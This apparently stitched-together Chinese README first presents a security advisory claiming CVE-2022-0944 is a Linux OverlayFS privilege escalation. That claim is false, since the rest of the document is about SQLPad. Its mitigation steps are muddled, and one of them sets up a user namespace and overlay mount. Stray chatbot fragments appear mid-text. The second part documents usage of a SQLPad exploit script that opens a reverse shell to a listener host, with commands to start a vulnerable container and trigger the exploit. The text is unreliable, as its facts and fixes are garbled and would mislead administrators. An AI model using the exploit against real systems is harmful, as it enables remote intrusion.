关于 Linux 内核 OverlayFS 权限提升漏洞的安全公告与缓解指南。
CVE-2022-0944 是 Linux 内核 OverlayFS 子系统中的一个安全漏洞,该漏洞源于特定配置下对文件创建的不当处理,使本地攻击者能够提升权限。

🚨 影响
本地攻击者可能能够:
通过精心构造的文件操作获取 root 权限
绕过安全限制
修改敏感的系统文件
破坏整个系统完整性
🔍 检测
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ 缓解措施
官方补丁
请升级到以下已修复版本之一:
Linux 内核 5.16.12 或更高版本
各厂商移植(backport)的补丁
更新命令:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
临时解决方案(若无法立即修补)
限制 OverlayFS 的使用:
sudo modprobe -r overlay
实施命名空间限制:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
应用 SELinux/AppArmor 策略: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ 免责声明 本文档仅供参考。尽管已尽力确保准确性, 但不提供任何保证。在生产环境部署之前,请务必先在开发环境中测试补丁。
最后更新:2023-10-01 | 查看变更日志
主要特点:
此 README 格式适用于:
您是否需要我:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
示例:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
本仓库所包含的代码和工具仅供教育目的使用,专门用于网络安全课程和学习环境。本代码作者对因使用、误用或修改本代码而产生的任何后果概不承担任何责任。本代码按“原样”提供,不附带任何明示或暗示的担保,包括但不限于对适销性或特定用途适用性的暗示担保。